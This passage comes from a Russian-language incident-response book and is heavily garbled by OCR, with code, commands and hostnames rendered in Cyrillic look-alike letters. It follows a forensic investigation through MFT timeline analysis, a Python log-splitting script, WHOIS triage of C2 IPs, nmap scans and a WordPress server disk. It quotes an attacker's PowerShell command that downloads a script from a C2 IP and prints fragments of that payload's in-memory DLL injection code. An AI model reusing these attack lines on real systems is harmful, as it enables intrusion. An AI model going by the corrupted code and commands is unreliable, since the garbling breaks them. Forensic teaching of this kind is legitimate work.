

ІлІггЬе-ІіозІ: (Ме\л/-0Ь]ес1; 

Ые!.ІлІеЬс 1 іепі:). бо\л/п1оаб5І:піп§( "ІтЬТрз://110.232.64.190/(раіаи§а1іаух") | 
оиІ-ТіІе .\5сгір1:_ріаіаи§а1іаух.1:х1: -аррепб 


Мы получаем файл с порядка 3000 строк. Вот теперь другое 
дело! Мы не будет просматривать его строка за строкой, но вот 
фрагменты кода, которые кажутся наиболее интересными: 


ІлІгіТе-ВуЬезТоМетогу -Вубез $Са1Ю1ІМаіп5С1 -МетогуАсІсІгезз $5СР5Мет 
[•••] 

МгзТе-ВуЬезТоМетогу -Вубез $Са1Ю1ІМаіп5СЗ -МетогуАсІсІгезз $5СР5Мет 
[•••] 

$К5САсісіг = $Ыіп32Рипс1:іоп5. ѴігЬиаІАІІосЕх. Іпѵоке($Кето1:еРгосНапсІ1е, 

[ІпІРІг]: :2его, [іііпііРііг] [ 1)Іп1:64]$5СН л $ІлІіп32Соп5І:ап1:5.МЕМ_СОММІТ -Ьог 
$Ыіп32Сопз1:ап1:5 .МЕМ_КЕ5ЕКѴЕ, $ІлІіп32Сопз1:ап1:5.РАСЕ_ЕХЕСІЯЕ_КЕАОЫРІТЕ) 

[•••] 

$5иссезз = $Ыіп32Рипс1:іоп5 . ІлІгдТеРгосеззМетогу. Іпѵоке($Кето1:еРгосНапсІ1е, 


82 Всегда избегайте использования своих обычных браузеров для повседневной работы, когда 
собираетесь поиграться с вредоносным пейлоадом. Кто знает, что вы получите: 0-бау для 
СНгогпе, баѵа-апплет для побега из песочницы и т.д. Если вы не знаете в точности, как 
защитить себя, используйте одноразовую машину с песочницей. 





$К5САсісіг., $5СР5МетОпі§іпа1, [ІІІп'ЬР'Ьг] [ІЯп1б4]$5СІ.еп§'ЬЬ, 

[ Ке-р ] $МитВу1:е5Ыг І1:±еп) 

[•••] 

$КТІігеасІНапсІ1е = Сгеаіе-Кето'ЬеТИгеасІ -РгосеззНапсІІе $Кето1:еРгосНапсІ1е - 
51:а гііАсісі гез 5 $К5САсісіп -Ыіп32Рипс1:іоп5 $ІлІіп32Рипс1:іоп5 

$Ке5и11: = $1лІіп32Рипс(:іоп5.ІлІаі1:Рог5іп§1еОЬіес1:.Іпѵоке($КТІігеасІНапсі1е л 20000) 

[ • • • ] 


Вы узнаете этот паттерн? Мы встречали его ранее, когда 
говорили о скрытных ЭИ-инъекциях на компьютере Барни: 

• ѴігІиаІАІІосЕх для выделения памяти в удаленном процессе 

С атрибутами РАеЕ_ЕХЕСІЯЕ_КЕАОІлІКІТЕ 

• ІлІгіѣеРгосеББМетогу для записи вредоносной ОІ_І_ 

• Сгеа1:е-КетоѣеТІігеасІ для выполнения кода 

Это известная модель атакующего: сбрасывать библиотеки 
ЭИ в какой-нибудь процесс, снижая отпечаток в памяти до 
совершенного минимума. Умно. Вот почему было так трудно 
обнаружить его на лишь одной машине. 

На данном этапе расследования у нас есть весьма 
основательное понимание образа действий атакующего. У нас 
достаточно ЮС (индикаторов компрометации), чтобы выявить 
большую часть зараженных машин. 

Однако, мы по-прежнему не знаем, какого рода документы 
утекли из компании. 

Он был остановлен немного раньше времени в мэйнфрейме, 
поэтому есть шансы, что он не смог слить базу данных клиентов. 
Однако, в окружении ѴѴіпсІоѵѵз он комфортно находился в течение 
двух месяцев. Поэтому высока вероятность, что он заполучил все 
критичные файлы, что там есть! Руководство запрашивает 
убедительные доказательства, вот почему мы пошли разбираться с 
5Ѵ0088 в первую очередь. 


Давайте вернемся к основам файловых систем. Каждая 
последняя операция с файлом автоматически фиксируется в 
свойствах этого файла в МРТ-таблице: последнее время доступа, 
последнее время создания и последнее время изменения. 

Это очень мощный источник информации, который дает 
точную карту последних изменений на диске. Мы не получим ни Ю 
пользователя, связанного с задачей, ни историю изменений, но это 
не имеет значения. 


Если папки отдела кадров и руководящего состава были 
скопированы в массовом порядке, мы должны будем увидеть 
относительно одинаковое время доступа в тысячах подпапок и 
файлов. Этого будет достаточно, чтобы доказать, что атакующий 
смог скопировать эти критичные файлы. 


Если вспомнить результат команды ттіз, то он отчетливо 
показал раздел, который был значительно крупнее, чем другие два 
(976562502*512 = 500 ГБ). 


:~/ гптІ5 -і аТТІіЬ 5ѵ0088_сІІ5к. ѵтсік 


005 РагТіТіоп ТаЫе 

ОТТзеТ 5есТог: 0 

ОпіТз аге іп 512-ЬуТе зесіогз 

ОезсгірТіоп 
Ргітагу ТаЫе (#0) 
Ііпаііосаіегі 
ЫТРБ / ехРАТ (0x07) 
МТР5 / ехРАТ (0x07) 
004: 000:002 |0083884032 1060446534 О97656250Г~| ГІТРБ / ехРАТ (0x07) 



51о1 

5ТагТ 

ЕпсІ 

І-епдТЬ 

000: 

МеТа 

0000000000 

0000000000 

0000000001 

001: 


0000000000 

0000002047 

0000002048 

002: 

000:000 

0000002048 

0000718847 

0000716800 

003: 

000:001 

0000718848 

0083884031 

0083165184 


Должно быть, это раздел, в котором хранятся общие папки, 
используемые руководящим составом корпорации. Мы переходим к 
снятию дампа МРТ этого раздела. 






Как уже отмечалось, МРТ - это всего лишь файл, как и любой 
другой файл, хранящийся в разделе. Мы можем установить его 
іпосіе при помощи -РІ5 и извлечь его содержимое, используя ісаі:. 



йбиагсі:-/ 

ТІ5 -і аТТІіЬ -о 83884032 5ѵ0088_сІІ5к . ѵшсік 

г/г 

4-128-4 

$А11:г0еТ 

г/г 

8-128-2 

$ЬасІСІи5 

г/г 

6-128-4 

$ВіТтар 

г/г 

0-128-6 

$МРТ 

г/г 

1-128-1 

$МРТМігг 

[...] 




:~/ ісаТ -і а-РТІіЬ -о 83884032 5ѵѲ088_сІІ5к.ѵшсік 0-128-6 > 
ТаЫе 5ѵ0088.тТі 


Чтобы извлечь и распарсить данные по времени, хранящиеся 
в МРТ-таблице, мы используем утилиту апаІугеМРТ. 83 Она дает на 
выходе С8Ѵ-файл, который мы сможем легко просмотреть, 
используя фильтры в ЕхсеІ: 


:~/ апаІугеМРТ.ру -Т ТаЫе_5ѵ0088.пгРі: -о оиТриі:_5ѵ0088 . С5Ѵ - 
рго§ге55 --Ьосіу-Риіі 


Опция -Ьосіу-Риіі” выводит полные имена путей, а не только 
лишь имена файлов, что только добавляет веса файлу, который 
иногда может достигать порядка 300-500 МБ, так что это не самый 
удобный размер для обработки посредством ЕхсеІ или ОрепСЖісе. 

Мы немного схитрим и преодолеем это ограничение. 
Поскольку мы ищем необычно огромное количество запросов 
доступа, то разделим этот крупный файл на множество маленьких 
файлов, каждый из которых будет содержать недельное количество 
операций доступа. 


83 И^Р5://аИИиЬ.сот/сІкоѵаг/апаІѵ2еМГТ 











Чем больше будет этот файл, тем больше запросов на доступ 
было выполнено во время этой недели. Используя подобный метод, 
мы должны будем выявить любой скачок, который привел к 
потенциальной утечке. 

Следующий РуіНоп-скрипт (5р1і1:_ЬосІу.ру) выполнит этот 

трюк: 

ітрогі: об 
ітрогі сіаіеііте 
ітрогі: ге 

# Создать выходной каталог 

і-р поі 05.раіН.ехІ5і5("оиіриі"): 
об . такесІіг5("оиіриі") 

# Открыть файл МРТ оиРриР, сгенерированный АпаІугеМРТ 

іл/ііИ ореп("т-Рі_оиіриі.іхі", 'г') а5 ігѵРіІе: 

Топ Ііпе іп ігѵРіІе: 

# Получить дату доступа по каждой записи 

с)аіе_5іг = 5іг(1іпе.5р1іі("\і") [10] .5р1іі(" ") [0]. 5І:пір()) 

# Если не дата, пропустить 

і-р ге. 5еапсИ(' [а-гА-2]', сІаі:е_5і:п) ог сІаі:е_5і:п=="": 
сопііпие 

# Если не подходящий формат, перезаписать дату 

і-Р с!а1:е_5іп.-РіпсІ( , 7") > 0: 

сІаі:е_5і:п = сІаі:еі:іте.сІаі:еі:іте.5і:прі:іте(сІаі:е_5і:г, 

'%сІ/%т/%У') .5ігРі:іте( 1 %У-%т-%с1 1 ) 
ігу: 

огі§іп_с)а1:е = сІаі:еі:іте.сІаі:еі:іте(2017, 01, 01).сіаііе() 
с)а1:е_гесогсІ = сІаі:еі:іте.сІаі:еі:іте.5і:прі:іте(сІаі:е_5і:п, 
"%У-%т-%сГ). сіаііе() 

# Если дата предшествует атаке (1 января), нас это 
не интересует 

і-р сІа1:е_гесогсІ < опі§іп_сІа1:е: 
сопііпие; 

# Сосчитать номер недели 

и/еек_питЬег = с)а1:е_гесопсІ. І50са1епс)ап() [1] 

# Записать выходные данные в уникальный файл по каждой 


неделе 


оиі: = ореп( "ои1:ри1:/т-Рі:_"+5І:г(іл/еек_питЬег) + " . сзѵ" /'а+") 
оиі: .іл/пі1:е(1іпе) 
оиі:. с1озе() 
ехсері:: 

ргіпі: "еггог:" + сІа1:е_5І:г 
рпіпі: "[ + ] Ропе" 


:~/ руТЬоп 5р1і1:_ЬосІу. ру 

[+] Эопе 


:~/ 11 оиТриТ/ 

ТоТаІ 290М 


-гы-г- 

-г— 

1 

гооі 

ГООІ 

15М 

Маг 

14 

15:03 

-н' 

ч- 

Е 

01.С5Ѵ 

-гм-г- 

-г— 

1 

гооТ 

ГООІ 

28М 

Маг 

14 

15:03 

тТі 

_02.С5Ѵ 

-ГМ-Г- 

-г— 

1 

ГООІ 

ГООІ 

26М 

Маг 

14 

15:03 

тТТ 

03.С5Ѵ 

-гм-г- 

-г— 

1 

ГООІ 

ГООІ 

22М 

Маг 

14 

15:03 

тТТ 

04.С5Ѵ 

-гм-г- 

-г— 

1 

ГООІ 

ГООІ 

ИМ 

Маг 

14 

15:03 

тТТ 

05.С5Ѵ 

-гм-г- 

- г— 

1 

ГООІ 

ГООІ 

28М 

Маг 

14 

15:03 

тТі 

06.С5Ѵ 

-гы-г- 

-г-- 

1 

гооі: 

ГООІ 

24М 

Маг 

14 

15:03 

тТі 

_07.С5Ѵ 

-гы-г- 

- г- - 

1 

гоо± 

гоо± 

74М 

Маг 

14 

15:04 

т-РЬ. 

_08.С5Ѵ 

-гм-г- 

-г— 

1 

ГООІ 

ГООІ 

24М 

Маг 

14 

15:03 

тТі 

_09.С5Ѵ 

-гм-г- 

-1— 

1 

ГООІ 

ГООІ 

16М 

Маг 

14 

15:03 

тТТ 

10.С5Ѵ 

-гм-г- 

-г— 

1 

ГООІ 

ГООІ 

27М 

Маг 

14 

15:03 

тТі 

11.С5Ѵ 


Неделя номер 8 выделяется заметным размером в сравнении 
с другими неделями. Открываем файл в ЕхсеІ и замечаем 
ожидаемый паттерн перебора: 


Весогсі 

ІМитЬег 

Рагепі РІІе 

Рмепате #1 

Вес. # 

51сІ ІпРо Ассезз сіаіе 

1060 

1060 /ВоагсІ/Визіпезз/$НагеЬоІсІег5/Ііз1:_5І§піРісагЛ_зНагеЬоІс)і 2017-01-31 22:46:12.260544 

1061 

1061 /Воагсі/Ви5Іпез5/5НагеЬоІсіегз/пе\л/_о11егіп§.рс1Р 

2017-01-31 22:46:12.360544 

1062 

1062 /Воагсі/Ви5Іпе$$/5НагеЬоІсіег$/пе\л/_о11егіп§_ѵ1.1.рсІ1 

2017-01-31 22:46:12.560545 

1063 

1063 /ВоагсІ/Ви5Іпе25/5ІпагеЬоІс1ег5/22_сігаРі_геѵепие52017.р( 

2017-01-31 22:46:12.760546 

1064 

1064 /ВоагсІ/Визіпе55/Такеоѵег_2018/сотрапіе5.хІ5х 

2017-01-31 15:46:13.260547 

1065 

1065 /Воагсі/Визіпе5з/Такеоѵег_2018/сотрапіе5_геѵепие5 

2017-01-31 22:46:12.360548 

1066 

1066 /ВоагсІ/Ви5Іпезз/Такеоѵег_2018/0ігесІог5_арргоѵаІ.рсі1 

2017-01-31 22:46:12.560549 

1067 

1067 /ВоагсІ/Ви5Іпе55/Такеоѵег_2018/НВ_ѵаІісІа'Ііоп 

2017-01-31 22:46:12.760550 

1068 

1068 /ВоагсІ/Ви5Іпе55/Такеоѵег_2018/гІ5к5_А1 

2017-01-31 22:46:13.260551 


Алфавитный порядок, в котором к этим файлам обращались, 
близкие значения времени доступа и позднее время суток 
указывают, что это работа атакующего. 





Мы передаем этот список файлов руководству компании, 
чтобы они могли принять подходящие меры на случай, если 
атакующий решит продать свои трофеи покупателю, 
предложившему самую высокую цену. 

Анализ ІР 

Пока мы завершали форензик-анализ 5Ѵ0088, админы прокси 
передали нам полный список всех удаленных ІР-адресов, с 
которыми контактировали подозреваемые сервера, определенные 
во время предыдущего анализа. 

Список очень маленький, потому что все эти сервера хостят 
внутренние приложения и не имеют оснований для вызова внешних 
ресурсов. Даже обновления подгружаются выделенными сервером, 
а затем распределяются внутри: 

з’Ьаѣіс .ТасеЬоок. сот 
31.3.224.101 

24.134.100.19 

акап087іТаз'сІ2аіасІ . 0971(2сІс . сот 
46.218.100.198 

37.60.48.19 
219.128.13.22 

62.129.29.10 
уапсіех. ги 
46.99.30.109 

27.117.128.10 
110.232.64.190 
5І:а1:іс .атаюп. сот 
40.77.228.68 
198.11.132.250 
98.131.152.149 
216.58.204.238 
ЗаоаіаІѲИ. .а8165181. сот 
198.11.131.20 
40.77.232.90 
27.114.192.89 


зііаскоѵег-ріоіл/. сот 

23.79.154.157 

98.139.180.149 

111.13.101.208 

208.80.153.224 

5.45.96.192 

89.111.176.202 

зТаІііс.ітсІЬ.сот 

5.45.96.61 

199.59.148.12 

23.100.122.175 

23.96.52.53 

191.239.213.197 

104.40.211.35 

104.43.195.251 

§І1:И иЬ. сот 

Даже не учитывая очевидное нарушение правил 
использования корпоративных ресурсов (зачем админам 
использовать сервер для посещения РасеЬоок?), мы можем быстро 
отметить три известные С2С ІЖІ_/ІР-адреса, а также некоторые 
другие, которые по виду повторяют одинаковый паттерн. 

Однако, чтобы тщательно разобраться, мы пишем 
простенький скрипт для разведки 84 , который получает 
ѴѴНОІЗ-информацию и выводит ее в СЗѴ-файл. 


ір 

„ СІП5 

■„ оѵѵпег „ пеіпате 

дсоипігу [ѵ 

219.128.13.22 

219.128.13.22 

СНШАМЕТ-Сй 

СМ 

5.255.255.70 

уапбех.ги 

ѴАЫйЕХ-5-255-255 

КЫ 

46.99.30.109 

46.99.30.109 

Ірко-РезісІепІіаІ-МАТ-РооІІ 

АІ. 

54.192.79.239 

зіаііс.атагоп.сот 

№Шате: АМА2ОМ-2011І. 

из 

40.77.228.68 

40.77.228.68 

ЫеШате: М5РТ 

из 

40.77.232.90 

40.77.232.90 

МеМате: МЗРТ 

УЗ 


84 Ні{р5://аііНиЬ.сот/НаскикеАРогп5іаг/Іео5{гіке/ЬІоЬ/та5іег/ѵѵІ~іоІ5.5Н 




Нам нужно удалить достоверные ІР-адреса и ІІР1_, чтобы 
получше сфокусироваться на оставшихся адресах. Под 
“достоверными” мы понимаем, что они либо принадлежат 
известным партнерам по бизнесу, либо известным компаниям. 85 

В этой таблице мы удаляем МісгозоТС и Уапсіех, но заносим в 
черный список ІР 219.128.13.22, уже найденный в процессе 
анализа МК0025. Также помечаем ІР 46.99.30.109, потому что он не 
резолвится в доменное имя, хостится в Албании и не соответствует 
ни одному сетевому диапазону партнеров. 

Обрабатываем оставшиеся ІР-адреса по такой же системе 
оценки 86 , что по итогу приводит к следующему списку: 


ІР РМ5 Страна 


24.134.110.28 

акап0871ТаісІ2аіасі.09730с1с.сот 

БЕ 

219.128.13.22 

219.128.13.22 

СМ 

46.99.30.109 

46.99.30.109 

А1_ 

27.1 17.128.10 

27.117.128.10 

КК 

110.232.64.190 

110.232.64.190 

ю 

23.79.154.157 

Заоа2а101І_.а8165181.сот 

113 

27.114.192.89 

27.114.192.89 

зс 

111.13.101.208 

111.13.101.208 

сы 

89.111.176.202 

89.111.176.202 

ВІІ 


Безусловно, будут некоторые ложноположительные 
результаты. В конечном счете, нет точной науки определения 
вредоносных ІР-адресов исходя из ѴѴНОІЗ-информации. 

Но лучше заблокировать весь вредоносный трафик и 
небольшую часть легитимного трафика, чем упустить часть 

85 Некоторые вредоносные программы используют сайты социальных сетей, чтобы получать 
команды и извлекать данные, подобного рода поведение не подходит под имеющиеся находки, 
полученные в этом расследовании. Ознакомьтесь с исследованием по технике ботаіп Ггопііпд: 

Н№5:/Ал/ѵтТігееѵе.сопі/ЬІодЛІтгеаі-ге5еагсІі/2017/03/арі29 ботаіп Ггопііп.ИітІ 

86 Как однажды сказал мой коллега и ментор: “Когда сомневаешься - заноси в черный список и 
жди, пока кто-нибудь не пожалуется”. 




вредоносного. Рабочие группы проинструктированы отслеживать 
свои приложения и докладывать о любых инцидентах, поэтому мы 
сможем быстро восстановить ситуацию. 

Обратите внимание на то, что ІР-адреса С2С рассредоточены 
по всему миру: США, Албания, Китай, Россия и так далее. Это 
приводит к важному выводу, с которым должен быть знаком каждый 
человек, работающий с инцидентами: по ІР-адресам невозможно 
установить атрибуцию. 

Журналисты и некоторые эксперты по (кибер)безопасности 
любят играть в установление принадлежности злоумышленников, 
основываясь на стране происхождения ІР-адресов, но это пустая 
трата времени. Любой человек может получить ІР-адрес в любой 
точке мира. 87 Иногда атакующие любят возлагать ответственность 
на другие страны, чтобы запутать следователей или извлечь выгоду 
из существующей политической напряженности, чтобы усложнить 
дело. 


В нашем случае атакующий, по всей видимости, владеет 
несколькими серверами в разных точках мира для поддержания 
максимальной устойчивости. Если один из С2С теряет доступ из-за 
того, что торопливый админ обнаружил бэкдор и вычистил рабочую 
станцию, то второй С2С по-прежнему сохранит доступ к другому 
серверу. 

Вот почему мы оттягиваем этап принятия мер по ликвидации 
последствий настолько, насколько это возможно. Нам нужно 
обрезать весь доступ за раз, чтобы гарантированно выкинуть 
атакующего насовсем. 

Мы передаем этот список ІР командам, ответственным за 
файрвол и прокси, и просим их фиксировать любой сервер или 


87 И^р://сгѵ1о.пе1/~іоеріе91/ЬІ1:соіпѵр5.Іі{тІ 




рабочую станцию, которые пытаются связаться с ІР из этого списка. 
Это должно распространяться на все зараженные активы І_ео8ігаі. 

Переходим к анализу второго важного списка ІР-адресов: все 
машины, общавшиеся по НРС (вновь, должно быть достаточно 
порта 135) в январе с сервером 5Ѵ0099, который является нашим 
предполагаемым нулевым пациентом. 


Понятно, что все это внутренние ІР-адреса, поэтому не ждите 
большого количества информации, кроме имен хостов. 


10.20.20.111 

10.20.20.112 

10.20.20.61 

10.20.20.161 

[...] 

192.168.10.11 

192.168.10.12 

[...] 

10.30.10.87 

10.30.10.90 

[...] 

10.89.12.11 


сісі . Іеозіігіке . согр 
сіс2 . Іеозіігіке . согр 
и/зиз. Іеозіігіке. согр 
Ьак. Іеозігіке .согр 

ЫК0011. Іеозіігіке . согр 
ЫК0012. Іеозіігіке . согр 

сІЬ001 . Іеозіігіке . согр 
сІЬ05б . Іеозіігіке . согр 

ЗѴ0933 . Іеозіігіке . согр 


Мы удаляем все “обычные” и “ожидаемые” машины, 
отправляющие НРС-пакеты, включая контроллеры домена, 
известные рабочие станции администраторов, ѴѴЗІІЗ (сервер 
обновлений) и так далее, но у нас по-прежнему остается 45 
ІР-адресов для выбора. 


Это будут сторонние приложения, кастомные скрипты и другие 
странные утилиты, которые обычно можно повстречать в 
корпорациях. Мы не знаем, какие машины имеют права на отправку 
НРС-пакетов, поэтому просим администратора ѴѴіпсІоѵѵз помочь 
найти какие-либо очевидные зацепки, которые мы могли упустить из 
виду, что-то по этим серверам, что может вызвать подозрения. 
Ничего. 


Не зная, что делать дальше, мы просто выполняем 
сканирование портов на всех этих машинах с опцией 1гасегои1:е. 
Поскольку у нас все еще нет схемы этой сети, мы будем 
использовать количество хопов, чтобы определить, где эти машины 
находятся. 


:~/ птар -п --Іг -И ірзгрс .ТхТ -оА гевиИ грс .1x1: 
Итар 5сап герогТ Тог 10.30.10.87 
РОКТ БТАТЕ 5ЕКѴІСЕ 
135/Тср ореп т5грс 
445/Тср ореп 5тЬ 
1433/Тср ореп Ш55С|1 
Бегѵісе ІпТо: 05: 1лІіпсІом5 

ТКАСЕКООТЕ 

НОР КТТ А00КЕ55 

1 0.46 ГП5 192.168.1.254 

2 0.56 Ш5 10.30.10.1 
[-] 

РІтар 5сап герогі Тог 10.30.10.90 
РОКТ 5ТАТЕ 5ЕКѴІСЕ 

135/Тср ореп гп5грс 

139/Тср ореп пеіЬіо5-55п 
443/Тср ореп ІіТТрз 

445/Тср ореп 5тЬ 

1433/Тср ореп Ш55С|1 
3389/Тср ореп гсір 
Бегѵісе ІпТо: 05: ілііпсіоыб 

ТКАСЕКООТЕ 

НОР КТТ А00КЕ55 

1 0.46 Ш5 192.168.1.254 

2 0.56 Ш5 10.30.10.1 

[-] 

КІтар 5сап герогТ Тог 10.89.12.11 
РОКТ 5ТАТЕ 5ЕКѴІСЕ 

22/Тср 55Н 

80/Тср ореп НТТр 

111/Тср ореп грс 

443/Тср ореп НТТрз 

3306/Тср ореп ту5д1 
Зегѵісе ІпТо: 05: Ипих 

ТКАСЕКООТЕ 

НОР КТТ А0ЭКЕ55 

1 0.46 Ш5 192.168.1.254 

2 0.56 Ш5 10.40.20.1 

3 0.56 Ш5 10.89.12.1 


Вы заметили аномалию? Если нет, присмотритесь еще раз. 
Видите порт 22 на машине 5Ѵ0933? Да, это Ыпих-машина! С какой 


целью Ыпих-машина отправляет НРС-команды на рандомный 
ѴѴіпсІоѵѵз-сервер? 

Могут быть некоторые редкие сценарии использования, 
которые можно было бы объяснить, но это, возможно, не один из 
них. Кроме того, по всей видимости, машина находится за одним 
лишним сетевым хопом, так что мы зовем администратора Ыпих и 
спрашиваем его об этом сервере. 

“Дайте-ка я проверю... 5Ѵ0933 - это каталог веб-продуктов в 

интернете. Но он был свернут несколько месяцев назад. Мы 

перешли на ЗааЗ-решение, а что?” 

Попался! До того, как мы даже начинаем анализ этой машины, 
мы уже понимаем, что выследили первую точку входа атакующего. 
Это должна быть именно она. 

Ыпих-машина хостится в публичной ЭМ 7. и не должна 
контактировать со внутренними ресурсами, и все же она 
отправляла НРС-команды на сервер ѴѴіпсІоѵѵз, который 
подозревается в качестве базы атакующего. Все сходится. 

Анализ І_іпих 

Сервер Ыпих - это очередная виртуальная машина. Вы 
можете подумать, что мы сразу же приступим к препарированию 
памяти в поисках подозрительных артефактов, но не в этот раз. 
Давайте поступим хитроумно. 

Атака, вероятно, произошла в течение декабря или января, 
возможно, даже раньше. Этого более чем достаточно, чтобы из 
памяти были вычищены любые значащие данные. Более того, 
любое закрепление, достаточно надежное, чтобы оставаться в 
памяти все это время, должно быть осуществлено на уровне диска. 
Иначе как оно переживет перезагрузку? 


В силу этих причин, мы лучше сосредоточимся на том, что 
произошло на диске, в частности, на веб-приложении, которое 
хостится на сервере. Атакующий скорее всего атаковал 
веб-приложение, а не забрутфорсил свой путь через 35Н или 
проэксплуатировал уязвимость нулевого дня для любого другого 
видимого сервиса. 

Мы подозреваем, что источником всего этого кошмара стала 
условная 301_-инъекция или удаленное выполнение кода либо для 
установленной СМ3, либо для кастомного кода, разработанного 
кем-то из І_еоЗіга1. Если это действительно так, атакующему, 
возможно, понадобился лишь деликатный механизм закрепления: 
учетная запись администратора СМ3, РНРЛЛЗР код на веб-странице 
и т.п. 


Мы копируем ѴМОК-файл, связанный с этим Ыпих-сервером, и 
бэкапим его на отдельный носитель. Как обычно, проставляем 
временную метку и хэш, затем ищем разделы на этом диске, 
используя классическую команду ттіз: 


:~/ ттІ5 -і аТТНЬ 5Ѵ0933_сІІ5к. ѵтсік 


0ГГ5ѲІ Бесіог: Ѳ 

11п11$ аге іп 512-ЬуІе зесіогі 


$1о1 5*аг1 Епс) 1_епд1Ь Оезсгірііоп 

000: Меіа ѲѲѲѲѲѲѲѲѲѲ 0000000000 ѳѳѳѳѳѳѳѳѳі Ргітагу ТаЫе (#0) 


001: . 0000000000 0000002047 0ѲѲ0002Ѳ48 Цпаііосаіегі 


002: 000:000 0ОѲ0ѲѲ2Ѳ48 00617103350061708288 Ипих (0x83) 


003: . 6661716336-666Т7І2383-06660Й5Ѳ4Й-ипаІ16саІё<Г 

004: Меіа 0061712382 0064423935 0002711554 005 Ехіепсіесі (0x05) 

005: Меіа 0061712382 0061712382 ѲѲѲѲѲѲѲѲѲІ Ех1еп(1е<1 ТаЫе (#1) 

006: 001:000 0061712384 0064423935 0002711552 іЛпих 5мар / 5оІагІ5 

007: . 0064423936 0064424575 ѲѲѲѲ0ѲѲ64Ѳ Упаііосаіесі 


Первый раздел, начинающийся со смещения 2048 (байт 1 048 
576), это раздел, который хостит файловую систему Ыпих. В 
отличие от ѴѴіпбоѵѵз, которая использует ЫТРЗ для сортировки 
файлов и папок, современные Ыпих-системы используют файловую 










систему ЕХТ4. Концепция Іпосіе (уникальный дескриптор файла) 
практически одинаковая, но вместо МРТ-таблицы мы получаем 
групповые дескрипторы и таблицу Іпосіе. 88 

Нам не нужно беспокоиться об этих тонкостях в этом 
конкретном сценарии. Мы не ищем руткит или малварь нулевого 
дня, скрывающуюся в забытом неиспользуемом пространстве. 89 

Мы подозреваем о наличии дыры на более высоких уровнях 
системы, на уровне веб-приложения. Мы можем выявить подобные 
отклонения, напрямую примонтировав раздел в режиме геасі-опіу и 
просмотрев папки на диске при помощи стандартных инструментов: 


:~/ тксііг /тп1:/5ѵ0993 

:~/ тоипТ -о го,1оор,оТТзе1:=1048576 5Ѵ0933_йІ5к.ѵтсік /тпТ/5ѵ0993/ 
:~/ І5 /тп1:/5ѵ0093/ѵаг/ммы/ 

1еосаѣа1о§ 

:~/ І5 /тп1:/5ѵ0093/ѵаг/ммм/1еоса1:а1ое 


■Со^аТ. 188К 
СІ Пл/Х г - х г - X 

9 

ѵмѵі-даіа 

ѵлм-сІаТа 

4.0К 

Зап 

11 

2017 

мр-агітіп 

СІ Пл/Х г - х г - X 

4 

шм-даіа 

ѵлм-сІаТа 

4.0К 

Зап 

11 

2017 

мр-сопТепТ 

СІ Пл/Х г - X г - X 

18 

шм-ёаіа 

ѵлм-сІаТа 

12К 

Зап 

11 

2017 

мр-іпсіисіез 

- Пл/- г- - г- - 

1 

шм-даіа 

ѵми-даіа 

418 

5ѳр 

25 

2013 

іпсіѳх .рЬр 

- Пл/- г- - г- - 

1 

ьмм-даіа 

ѵмы-даіа 

20К 

Зап 

2 

2017 

Тісепзе.ТхІ: 

- Пл/- г- - г- - 

1 

ѵмні -сІаТа 

ѵлм-сІаТа 

7.3К 

Зап 

11 

2017 

гѳасІтѳ.ЫтТ 

- Пл/- г- - г- - 

1 

ѵлм-сіаТа 

ѵьм-даХа 

5.4К 

8ѳр 

27 

2016 

мр-асТіѵаТе.рГір 

- Пл/-г- - г- - 

1 

ѵллѵі-сІаТа 

ѵмм-даХа 

364 

Оес 

19 

2015 

мр -ЬТод -Гіеасіѳ г. рНр 

- Пл/- г- - г- - 

1 

ѵллѵг-сІаТа 

ѵмм-даХа 

1.6К 

Аид 

29 

2016 

адр-соттепТз-розІ: .рИр 

- Пл/- г- - г- - 

1 

ѵллѵг-сІаТа 

ѵ/ш-даХа 

2.8К 

Рѳс 

16 

2015 

мр-сопГід-затрТе.рИр 

- Пл/- г- - г- - 

1 

ѵлілѵ-сіаТа 

ѵим- сІаТа 

З.ЗК Мау 

24 

2015 

мр-сгоп.рГір 

- Пл/- г- - г- - 

1 

мм-сІаТа 

ѵлм-сІаТа 

2.4К 

Моѵ 

21 

2016 

мр-Ипкз-ортТ .рИр 


88 Интересное описание структуры ЕХТ4: 

Іт№зз://ѵѵѵѵѵѵ.й!п/ѵ5.ога/5ііез/йе!аиІШез/5еззіоп-!іІез/рарег-ап апаіѵзіз о! ехі4 Еог сііаііаі /огепзісз. 

ЕЙ! 

89 Операционные системы выделяют блоки фиксированного размера. Когда вы создаете файл, 
содержащий букву “А”, операционная система резервирует 4096 байтов для этого файла в 
целях оптимизации. Оставшиеся 4095 байтов считаются неиспользуемым пространством. 
Стандартные инструменты обработки данных (поіераф ѴѴогсІ) останавливаются на символе 
“ЕпсІ о! Рііе” (конец файла), таким образом показывая только 1 байт, но МРТ отчетливо 
показывает, что файл на деле 4096 байт длиной. 









Веб-приложение живет в директории /ѵаг/ѵ\»мм/1еоса1:а1о§. 
Используемые имена ясно указывают на приложение на базе 
ѴѴогсІРгезз, работающее на версии 4.7: 


:~/ НеасІ /тпТ/5ѵѲѲ93/ѵаг/м\лгы/1еоса1:а1ое/геасІп)е.Ы:т1 


стеіа пате="ѵіѳ\л/рог1; " соп!;ѳп'(:="місІ1:Іп=сІеѵісе-\я(ісІ'(;Ь" /> 

стеіа ЫІр-едиіѵ^'СопІѳпІ: -Туре" соп1епІ= І Чех'1/Ыт1; сЬагзе^иИ-З" /> 

сІіІІѳгМогсІРгезз &#825Ѳ; ВѳасІМе</1:і1:1ѳ> 

<1іпк ге1="з1:у1е5Ьее1:" Ьге'Г="мр-асІтіп/с55/іп5І:а'11 .сзз?ѵег=20100228" Іуре^ЧехІ/сзз" /> 

</ЬеасІ> 

<ЬосІу> 

<М1 ісІ="1одо"> 

<а І~іге'( : ="Ы:1:р5 ://ѵю г6р гезз .огд/"хітд а11:='‘\л/огсІРгезз" згс="мр-асітіп/ітадѳз/ід/огсіргѳзз-1с 
I <Ьг /> Ѵегзіоп 4.7 I 


Совершенно точно есть уязвимости 90 , затрагивающие эту 
версию, поэтому любая из них могла стать причиной для входа. Мы 
продолжаем расследование, ищем последние измененные файлы в 
надежде заметить непосредственную атаку. 

Запускаем команду -РіпсІ с набором опций для фильтрации 
ненужного шума: опция “--Ьуре” для -РіпсІ ищет файлы, “-пгЫте” 
возвращает файлы, измененные за последние 90 дней, опция 
“-пате” включает в отчет только рИр-файлы: 


:~/ ТіпсІ /ѵаг/мѵлу/1еоса1:а1о§ -Туре Т -тТіте -90 -пате "*.рНр" 
/ѵаг/ммм/1еосаТа1ое/мр-іпс1исІе5/ІХР/с1а55-ІХК-(іа1:е. рЬр 
